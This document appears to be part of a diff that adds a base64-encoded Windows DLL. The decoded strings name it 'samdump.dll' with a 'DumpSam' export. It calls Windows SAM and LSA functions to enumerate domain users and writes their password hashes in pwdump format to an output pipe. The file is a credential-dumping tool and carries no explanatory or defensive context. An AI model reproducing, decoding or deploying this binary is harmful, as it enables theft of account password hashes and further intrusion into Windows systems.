+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAANmgAABpoAAAOaAAAAAAAAKxnAABqZwAAkGcAANxnAADyZwAAoGcAAHpnAAC6ZwAA
+yGcAAMppAABUaAAAYGgAAHJoAACAaAAAjmgAAKJoAAC2aAAAzGgAANpoAADmaAAA8GgAAABpAAAO
+aQAAIGkAADBpAAA+aQAAUGkAAGhpAAB+aQAAmGkAALJpAABYZwAA5GkAAPJpAAAAagAADmoAABpq
+AAAsagAARGoAAFxqAAB0agAAjGoAAKhqAAC0agAAwGoAAMpqAADWagAA5moAAPRqAAAEawAAGmsA
+ACprAAA6awAATGsAAAAAAAAAAAAA/////84SABDUEgAQBgAABgABAAAQAAMGAAYCEARFRUUFBQUF
+BTUwAFAAAAAAICg4UFgHCAA3MDBXUAcAACAgCAAAAAAIYGhgYGBgAABwcHh4eHgIBwgAAAcACAgI
+AAAIAAgABwgAAAAoAG4AdQBsAGwAKQAAAAAAKG51bGwpAABydW50aW1lIGVycm9yIAAADQoAAFRM
+T1NTIGVycm9yDQoAAABTSU5HIGVycm9yDQoAAAAARE9NQUlOIGVycm9yDQoAAFI2MDI4DQotIHVu
+YWJsZSB0byBpbml0aWFsaXplIGhlYXANCgAAAABSNjAyNw0KLSBub3QgZW5vdWdoIHNwYWNlIGZv
+ciBsb3dpbyBpbml0aWFsaXphdGlvbg0KAAAAAFI2MDI2DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9y
+IHN0ZGlvIGluaXRpYWxpemF0aW9uDQoAAAAAUjYwMjUNCi0gcHVyZSB2aXJ0dWFsIGZ1bmN0aW9u
+IGNhbGwNCgAAAFI2MDI0DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIF9vbmV4aXQvYXRleGl0IHRh
+YmxlDQoAAAAAUjYwMTkNCi0gdW5hYmxlIHRvIG9wZW4gY29uc29sZSBkZXZpY2UNCgAAAABSNjAx
+OA0KLSB1bmV4cGVjdGVkIGhlYXAgZXJyb3INCgAAAABSNjAxNw0KLSB1bmV4cGVjdGVkIG11bHRp
+dGhyZWFkIGxvY2sgZXJyb3INCgAAAABSNjAxNg0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciB0aHJl
+YWQgZGF0YQ0KAA0KYWJub3JtYWwgcHJvZ3JhbSB0ZXJtaW5hdGlvbg0KAAAAAFI2MDA5DQotIG5v
+dCBlbm91Z2ggc3BhY2UgZm9yIGVudmlyb25tZW50DQoAUjYwMDgNCi0gbm90IGVub3VnaCBzcGFj
+ZSBmb3IgYXJndW1lbnRzDQoAAABSNjAwMg0KLSBmbG9hdGluZyBwb2ludCBub3QgbG9hZGVkDQoA
+AAAATWljcm9zb2Z0IFZpc3VhbCBDKysgUnVudGltZSBMaWJyYXJ5AAAAAAoKAABSdW50aW1lIEVy
+cm9yIQoKUHJvZ3JhbTogAAAALi4uADxwcm9ncmFtIG5hbWUgdW5rbm93bj4AAEdldExhc3RBY3Rp
+dmVQb3B1cAAAR2V0QWN0aXZlV2luZG93AE1lc3NhZ2VCb3hBAHVzZXIzMi5kbGwAAAAAAAAAAAAA
+AAAAAP////8DUAAQB1AAEP////+3UAAQu1AAEP////87UgAQP1IAEEg6bW06c3MAZGRkZCwgTU1N
+TSBkZCwgeXl5eQBNL2QveXkAAFBNAABBTQAARGVjZW1iZXIAAAAATm92ZW1iZXIAAAAAT2N0b2Jl
+cgBTZXB0ZW1iZXIAAABBdWd1c3QAAEp1bHkAAAAASnVuZQAAAABBcHJpbAAAAE1hcmNoAAAARmVi
+cnVhcnkAAAAASmFudWFyeQBEZWMATm92AE9jdABTZXAAQXVnAEp1bABKdW4ATWF5AEFwcgBNYXIA
+RmViAEphbgBTYXR1cmRheQAAAABGcmlkYXkAAFRodXJzZGF5AAAAAFdlZG5lc2RheQAAAFR1ZXNk
+YXkATW9uZGF5AABTdW5kYXkAAFNhdABGcmkAVGh1AFdlZABUdWUATW9uAFN1bgBTdW5Nb25UdWVX
+ZWRUaHVGcmlTYXQAAABKYW5GZWJNYXJBcHJNYXlKdW5KdWxBdWdTZXBPY3ROb3ZEZWMAAAAAfGYA
+AAAAAAAAAAAAAGgAABBgAABsZgAAAAAAAAAAAABGaAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+NmgAABpoAAAOaAAAAAAAAKxnAABqZwAAkGcAANxnAADyZwAAoGcAAHpnAAC6ZwAAyGcAAMppAABU
+aAAAYGgAAHJoAACAaAAAjmgAAKJoAAC2aAAAzGgAANpoAADmaAAA8GgAAABpAAAOaQAAIGkAADBp
+AAA+aQAAUGkAAGhpAAB+aQAAmGkAALJpAABYZwAA5GkAAPJpAAAAagAADmoAABpqAAAsagAARGoA
+AFxqAAB0agAAjGoAAKhqAAC0agAAwGoAAMpqAADWagAA5moAAPRqAAAEawAAGmsAACprAAA6awAA
+TGsAAAAAAABTAUdldFByb2NBZGRyZXNzAADfAUxvYWRMaWJyYXJ5QQAAGAJPdXRwdXREZWJ1Z1N0
+cmluZ0EAAC0BR2V0TGFzdEVycm9yAAAOA1dyaXRlRmlsZQDDAEZyZWVMaWJyYXJ5AB4AQ2xvc2VI
+YW5kbGUAuQBGbHVzaEZpbGVCdWZmZXJzAAABA1dpZGVDaGFyVG9NdWx0aUJ5dGUANwBDcmVhdGVG
+aWxlQQBLRVJORUwzMi5kbGwAAB8BTHNhQ2xvc2UAAEEBTHNhUXVlcnlJbmZvcm1hdGlvblBvbGlj
+eQA7AUxzYU9wZW5Qb2xpY3kAQURWQVBJMzIuZGxsAABXAlJ0bFVud2luZADaAEdldENvbW1hbmRM
+aW5lQQCOAUdldFZlcnNpb24AAIwARXhpdFByb2Nlc3MAywJUZXJtaW5hdGVQcm9jZXNzAAAJAUdl
+dEN1cnJlbnRQcm9jZXNzAAwBR2V0Q3VycmVudFRocmVhZElkAADTAlRsc1NldFZhbHVlANACVGxz
+QWxsb2MAANECVGxzRnJlZQCcAlNldExhc3RFcnJvcgAA0gJUbHNHZXRWYWx1ZQCYAlNldEhhbmRs
+ZUNvdW50AABoAUdldFN0ZEhhbmRsZQAAKAFHZXRGaWxlVHlwZQBmAUdldFN0YXJ0dXBJbmZvQQBa
+AERlbGV0ZUNyaXRpY2FsU2VjdGlvbgA4AUdldE1vZHVsZUZpbGVOYW1lQQAAwQBGcmVlRW52aXJv
+bm1lbnRTdHJpbmdzQQDCAEZyZWVFbnZpcm9ubWVudFN0cmluZ3NXABkBR2V0RW52aXJvbm1lbnRT
+dHJpbmdzABsBR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAuAFIZWFwRGVzdHJveQC2AUhlYXBDcmVh
+dGUAAPECVmlydHVhbEZyZWUAugFIZWFwRnJlZQAAlQJTZXRGaWxlUG9pbnRlcgAAbwBFbnRlckNy
+aXRpY2FsU2VjdGlvbgAA3gFMZWF2ZUNyaXRpY2FsU2VjdGlvbgAAyAFJbnRlcmxvY2tlZERlY3Jl
+bWVudAAAywFJbnRlcmxvY2tlZEluY3JlbWVudAAAxQFJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9u
+ALQBSGVhcEFsbG9jAM8AR2V0Q1BJbmZvAMkAR2V0QUNQAABGAUdldE9FTUNQAADuAlZpcnR1YWxB
+bGxvYwAAvQFIZWFwUmVBbGxvYwCoAlNldFN0ZEhhbmRsZQAAAgJNdWx0aUJ5dGVUb1dpZGVDaGFy
+ANwBTENNYXBTdHJpbmdBAADdAUxDTWFwU3RyaW5nVwAAaQFHZXRTdHJpbmdUeXBlQQAAbAFHZXRT
+dHJpbmdUeXBlVwAAAAAAAAAAE/jgOAAAAACSawAAAQAAAAEAAAABAAAAiGsAAIxrAACQawAA8BIA
+AJ5rAAAAAHNhbWR1bXAuZGxsAER1bXBTYW0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAOYyABC4PQAQAAAAAAAAAACOMwAQAAAAAAAAAAAAAAAAAAAAAFNhbXJDbG9z
+ZUhhbmRsZQBTYW1JRnJlZV9TQU1QUl9FTlVNRVJBVElPTl9CVUZGRVIAAABTYW1JRnJlZV9TQU1Q
+Ul9VU0VSX0lORk9fQlVGRkVSAFNhbXJFbnVtZXJhdGVVc2Vyc0luRG9tYWluAABTYW1yUXVlcnlJ
+bmZvcm1hdGlvblVzZXIAAAAAU2Ftck9wZW5Vc2VyAAAAAFNhbXJPcGVuRG9tYWluAABTYW1JQ29u
+bmVjdABzYW1zcnYuZGxsAABXcml0ZUZpbGUgZmFpbGVkOiAlZApUZXh0OiAlcwAAACVzOiVkOiUw
+MnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAy
+eCUwMng6JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAyeCUwMnglMDJ4JTAy
+eCUwMnglMDJ4JTAyeDo6OgoAU2FtclF1ZXJ5SW5mb3JtYXRpb25Vc2VyIGZhaWxlZCA6IDB4JTA4
+WAoAAABTYW1yT3BlblVzZXIoMHgleCkgZmFpbGVkIDogMHglMDhYCgBTYW1yRW51bWVyYXRlVXNl
+cnNJbkRvbWFpbiBmYWlsZWQgOiAweCUwOFgKAFNhbU9wZW5Eb21haW4gZmFpbGVkIDogMHglMDhY
+CgAAU2FtQ29ubmVjdCBmYWlsZWQgOiAweCUwOFgAAExzYVF1ZXJ5SW5mb3JtYXRpb25Qb2xpY3kg
+ZmFpbGVkIDogMHglMDhYAAAATHNhT3BlblBvbGljeSBmYWlsZWQgOiAweCUwOFgAAABGYWlsZWQg
+dG8gbG9hZCBmdW5jdGlvbnMKAAAARmFpbGVkIHRvIG9wZW4gb3V0cHV0IHBpcGUoJXMpOiAlZAoA
+IAWTGQAAAAAAAAAAAAAAAKkkABBoYQAQWGEAEP////8AAAAA/////wAKAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAEAAAAAIAAADUYwAQCAAAAKhjABAJAAAAfGMAEAoAAABYYwAQEAAAACxj
+ABARAAAA/GIAEBIAAADYYgAQEwAAAKxiABAYAAAAdGIAEBkAAABMYgAQGgAAABRiABAbAAAA3GEA
+EBwAAAC0YQAQeAAAAKRhABB5AAAAlGEAEHoAAACEYQAQ/AAAAIBhABD/AAAAcGEAEGCFABAAAAAA
+YIUAEAEBAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAEAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAACAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAABtTgAQbU4AEG1OABBtTgAQbU4AEG1OABBidgAQYnYAEAAAIAAgACAAIAAgACAAIAAgACAA
+KAAoACgAKAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEgAEAAQABAAEAAQ
+ABAAEAAQABAAEAAQABAAEAAQABAAhACEAIQAhACEAIQAhACEAIQAhAAQABAAEAAQABAAEAAQAIEA
+gQCBAIEAgQCBAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAQABAAEAAQ
+ABAAEACCAIIAggCCAIIAggACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIA
+EAAQABAAEAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ
+gQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAECBABAAAAAAAAAAAAAAAABYgQAQAAAAAAAA
+AAAAAAAAKIEAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAUAAMALAAAAAAAAAB0AAMAEAAAAAAAAAJYAAMAEAAAAAAAAAI0AAMAI
+AAAAAAAAAI4AAMAIAAAAAAAAAI8AAMAIAAAAAAAAAJAAAMAIAAAAAAAAAJEAAMAIAAAAAAAAAJIA
+AMAIAAAAAAAAAJMAAMAIAAAAAAAAAAMAAAAHAAAAeAAAAAoAAAAAAAAAAAAAAAECBAgAAAAApAMA
+AGCCeYIhAAAAAAAAAKbfAAAAAAAAoaUAAAAAAACBn+D8AAAAAEB+gPwAAAAAqAMAAMGj2qMgAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAACB/gAAAAAAAED+AAAAAAAAtQMAAMGj2qMgAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAACB/gAAAAAAAEH+AAAAAAAAtgMAAM+i5KIaAOWi6KJbAAAAAAAAAAAAAAAAAAAA
+AACB/gAAAAAAAEB+of4AAAAAUQUAAFHaXtogAF/aatoyAAAAAAAAAAAAAAAAAAAAAACB09je4PkA
+ADF+gf4AAAAAAAAAAAAAAAD4AwAAAAAAAAAAAAAAAAAAAQAAABYAAAACAAAAAgAAAAMAAAACAAAA
+BAAAABgAAAAFAAAADQAAAAYAAAAJAAAABwAAAAwAAAAIAAAADAAAAAkAAAAMAAAACgAAAAcAAAAL
+AAAACAAAAAwAAAAWAAAADQAAABYAAAAPAAAAAgAAABAAAAANAAAAEQAAABIAAAASAAAAAgAAACEA
+AAANAAAANQAAAAIAAABBAAAADQAAAEMAAAACAAAAUAAAABEAAABSAAAADQAAAFMAAAANAAAAVwAA
+ABYAAABZAAAACwAAAGwAAAANAAAAbQAAACAAAABwAAAAHAAAAHIAAAAJAAAABgAAABYAAACAAAAA
+CgAAAIEAAAAKAAAAggAAAAkAAACDAAAAFgAAAIQAAAANAAAAkQAAACkAAACeAAAADQAAAKEAAAAC
+AAAApAAAAAsAAACnAAAADQAAALcAAAARAAAAzgAAAAIAAADXAAAACwAAABgHAAAMAAAAQwAAAEMA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAEMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAuAAAAAQAAAFh9ABAAAAAA7GUA
+EOhlABDkZQAQ4GUAENxlABDYZQAQ1GUAEMxlABDEZQAQvGUAELBlABCkZQAQnGUAEJBlABCMZQAQ
+iGUAEIRlABCAZQAQfGUAEHhlABB0ZQAQcGUAEGxlABBoZQAQZGUAEGBlABBYZQAQTGUAEERlABA8
+ZQAQfGUAEDRlABAsZQAQJGUAEBhlABAQZQAQBGUAEPhkABD0ZAAQ8GQAEOhkABDUZAAQzGQAEAAA
+AAAuAAAAAAAAAAh+ABAoggAQKIIAECiCABAoggAQKIIAECiCABAoggAQKIIAECiCABB/f39/f39/
+fxB+ABAAAAAAAAAAAAAAAACAcAAAAQAAAPDx//9QU1QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUERUAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFx+ABCcfgAQAAAAAP//
+//8AAAAAAAAAAAAAAAD/////AAAAAAAAAAAAAAAAAAAAAAAAAAD/////HgAAADsAAABaAAAAeAAA
+AJcAAAC1AAAA1AAAAPMAAAARAQAAMAEAAE4BAABtAQAA/////x4AAAA6AAAAWQAAAHcAAACWAAAA
+tAAAANMAAADyAAAAEAEAAC8BAABNAQAAbAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAA8AAA
+AAIwCDAOMBMwGTAgMCUwKjAzMDgwPjBGMEswUTBYMF0wYjBrMHAwdjB+MIMwiTCQMJUwmjCjMKgw
+szC9MMcw0TDbMOUwLjE5MT8xXDGmMasxoTIyMz8zRjNjM3YzuDPVM/0zFTQfNEc0aTRzNJs0xDTc
+NAQ1PzVYNXw1kzWdNcU10DVCNnc2hjaxNtQ25Tb2Ng83FjcbNyY3QjdIN043sDfxN1o4dDh9OMA5
+xznWOd456TnvOfU5/zkXOhw6JjpAOk46VjpcOp86sToNOyg7NztTO6w7tDsOPBs8vjzNPOM8Ez7N
+Ptc/AAAAIAAAEAEAAB4wPzBWMMswkzOXM5sznzOjM6czqzOvM300iDSNNJc0nDTUNOA05zT3NP00
+BDUONSc1LzU0NUA1RTViNWg1ojWqNcQ1yjXbNfQ1ADYGNhM2IzYpNjE2TzZVNmY2fTaHNqA2Ajca
+NyA3SjdQN3I3hje4N7831DcGOBA4MThGOGo4lDiiONM42TjmOAc5LDk7OUo5fDmMOc852znlOfk5
+BzoUOhk6Hzp6OoE6yToOO/E7Cjw/PEc8YTxtPH08vDwMPR89XT2BPYg9mT2fPa89tj29PcU97D34
+PQI+Cj4SPhg+Jj41Pkc+bT56Pog+kz6mPs0+3D4ePzI/UD9cP3g/jT+jP6o/uD/LPwAwAABEAQAA
+QjBPMHQwkDCjMBcxtzEEMhwyMTJ7MsMy2jLnMgEzDzMdMygzPDNCM1AzWTNqM4YzlTOnM7AzzDPv
+M/kzAjQeNEE00TTZNN805zQyNVc1aTVvNXg2fjaGNo42ljaiNqc2sza7NsM2yzbhNuk28Tb5NgE3
+FDccN0k3ZDd0N3o3qTfRN9c34zdJOE84VziaONQ42jj9ORk6JjozOkY6TzpbOo06nzquOs861Tr2
+OgA7CzsQOxg7LztEO0o7UjtaO2U7kzufO6k7tDu+O8g7zjsRPBs8IDwlPCo8QzxJPLg8vjzcPO08
+AD0VPTM9QT1OPV49fz2LPZ09qz26Pcs9GD4wPjc+Pz5EPkg+TD51Pps+tT68PsA+xD7IPsw+0D7U
+Ptg+Ij8oPyw/MD80P5o/pT/AP8c/zD/QP9Q/8T8AAABAAAAAAQAAGzBNMFQwWDBcMGAwZDBoMGww
+cDC6MMAwxDDIMMwwHjEkMSsxNDE7MUMxSTFUMVwxqzO5M78z2TPeM+0z8zMDNA40IDQzND40RDRJ
+NE80XDR5NH80ijSQNJo0oDSwNLY0+jSgNY03mDegN7M3uTfPN9Y33DfmN+w38Tf3Nwc4EDgqODs4
+QThUOLY4YzlsOXI5fjmDOY05lDmcOaI5qTmuOb852zn9Ogo7Lzt6O4k7qTvLO/g7DDxGPE08czyL
+PKU8sDzGPM489zwEPQk9Fj0iPdw94z38PT4+UD7ZPvk+/j4dPyo/Nz9BP0s/Uz9hP38/nD+0P9Q/
+AAAAUAAAwAAAACwwQjB1MN0wAjFIMU0xaTF8MYMxlTGdMa0xvjHRMekxCTJfMnEyyDLgMucy7zL0
+Mvgy/DIlM0szZTNsM3AzdDN4M3wzgDOEM4gz0jPYM9wz4DPkM0o0VTRwNHc0fDSANIQ0oTTLNP00
+BDUINQw1EDUUNRg1HDUgNWo1cDV0NXg1fDVJNlk2izaVNmY4eTj4OAI5Hjl+OcY5zDnaOSk6WTq0
+Oro6yDomO1U7ZDu8O/Q7BjwZPFU8nj0AYAAAGAAAAPQw+DCsNLA0uDS8NMQ0yDQAcAAAyAAAAAww
+EDAcMPQy+DL8MjQzPDNEM0wzVDNcM2QzbDN0M3wzhDOMM5QznDOkM6wztDO8M8AzyDNANkQ2SDZM
+NlA2VDZYNlw2dDiUOKQ4tDhQPVg9XD1gPWQ9aD1sPXA9dD14PXw9gD2EPYg9jD2QPZQ9mD2cPaA9
+pD2oPaw9sD20Pbg9vD3APcQ9yD3MPdA91D3YPdw94D3kPeg97D3wPfQ9+D38PQA+ED4UPhg+HD4g
+PiQ+KD4sPjA+ND5APtw+4D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
